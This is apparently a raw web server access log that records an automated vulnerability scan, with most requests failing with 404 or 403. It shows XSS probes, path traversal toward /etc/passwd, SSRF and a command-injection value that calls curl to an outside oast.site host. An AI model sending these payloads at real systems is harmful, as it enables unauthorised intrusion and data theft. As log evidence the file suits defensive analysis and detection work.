[29/Nov/2024:09:56:47 +0800] "GET /libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "POST /spcgi.cgi HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "POST /api/2.0/mlflow/registered-models/create HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/123.0" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "POST /ajax/api/user/save HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.6) Gecko/20050325 Firefox/1.0.2 (Debian package 1.0.2-1)" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /api/v1/config/application?public=true HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; U; SunOS sun4v; en-US; rv:1.8.1.3) Gecko/20070321 Firefox/2.0.0.3" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4280.67 Safari/537.36 Edg/97.0.664.52" 172.18.0.4 - - [29/Nov/2024:09:56:47 +0800] "GET /libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36 Edg/100.0.1185.29" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1" 403 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.2277.133" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /forms/doLogin?login_username=admin&password=password$(curl%20ct4hu7d65jrdcfcsg340pfmytn3g7wp9o.oast.site)&x=0&y=0 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "POST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1" 404 548 "http://96.9.228.88:888" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /modules/jmsblog/config.xml HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/604.2.4 (KHTML, like Gecko) Version/9.1.2 Safari/604.2.4" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /v1/avatars/favicon?url=http://ct4hu7d65jrdcfcsg340c5p5q15ojg9uw.oast.site HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/607.1.40 (KHTML, like Gecko) Version/9.1.2 Safari/607.1.40" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /_admin/imgdownload.php?filename=imgdownload.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.140" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /wp-json/wp/v2/add-listing?id=1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Edg/100.0.1185.44" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "POST /api/jmeter/download/files HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /session/login HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS aarch64 14989.107.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "POST /atutor/login.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 12239.92.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.136 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "POST /inc/jquery/uploadify/uploadify.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "POST /druid/indexer/v1/sampler?for=connect HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /wp-admin/profile.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "POST /attachment/404/aabba.php HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /app?service=page/SetupCompleted HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 maglev/23335.232.2637.4844/49" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /spip.php?page=spip_pass HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.19" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "POST /app HTTP/1.1" 404 548 "-" "page-preview-tool Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.59 Safari/537.36 Edg/92.0.902.23" 172.18.0.4 - - [29/Nov/2024:09:56:48 +0800] "POST /app HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 13904.97.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.167 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.42" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.6) Gecko/20050325 Firefox/1.0.2 (Debian package 1.0.2-1)" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/4 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/607.1.40 (KHTML, like Gecko) Version/9.1.2 Safari/607.1.40" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/5 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "POST / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/hassio/app/.%09./supervisor/info HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/121.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /tshirtecommerce/fonts.php?name=2&type=./../index.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/606.1.36 (KHTML, like Gecko) Version/9.1.2 Safari/606.1.36" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/2 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh: Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML: like Gecko) Version/16.0 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.46" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 maglev/23335.219.2592.8659/49" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/1 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "GET /api/v1/database/3 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "POST /app HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "POST /api/add-article-by-text HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.4" 172.18.0.4 - - [29/Nov/2024:09:56:49 +0800] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /cas/logout?url=https://oast.pro\x22> HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0: Win64: x64) AppleWebKit/537.36 (KHTML: like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:57.0) Gecko/20100101 Firefox/57.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.60" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64:91.0) Gecko/20100101 Firefox/91.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/9 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.82" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/7 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /users/sign_in HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:35.0) Gecko/20100101 Firefox/35.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /?s=4JMGMF%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/zDJ/ HTTP/1.1" 403 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.38" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "POST /app HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0: Win64: x64) AppleWebKit/537.36 (KHTML: like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /cpanelwebcall/%3Cimg%20src=x%20onerror=%22prompt%28document.domain%29%22%3Eaaaaaaaaaaaa HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.0.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "POST /index.php/management/set_timezone HTTP/1.1" 404 47 "http://96.9.228.88:888/index.php/management/datetime" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.38" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "POST /minio/bootstrap/v1/verify HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/10 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /_api/web/siteusers HTTP/1.1" 404 146 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "POST /classes/Login.php?f=login HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.43" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "POST /classes/Login.php?f=login HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "POST /job/list HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "POST / HTTP/1.1" 403 146 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.1517.0 Ddg/17.0" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "POST /user/save HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" 172.18.0.4 - - [29/Nov/2024:09:56:50 +0800] "GET /api/v1/database/6 HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 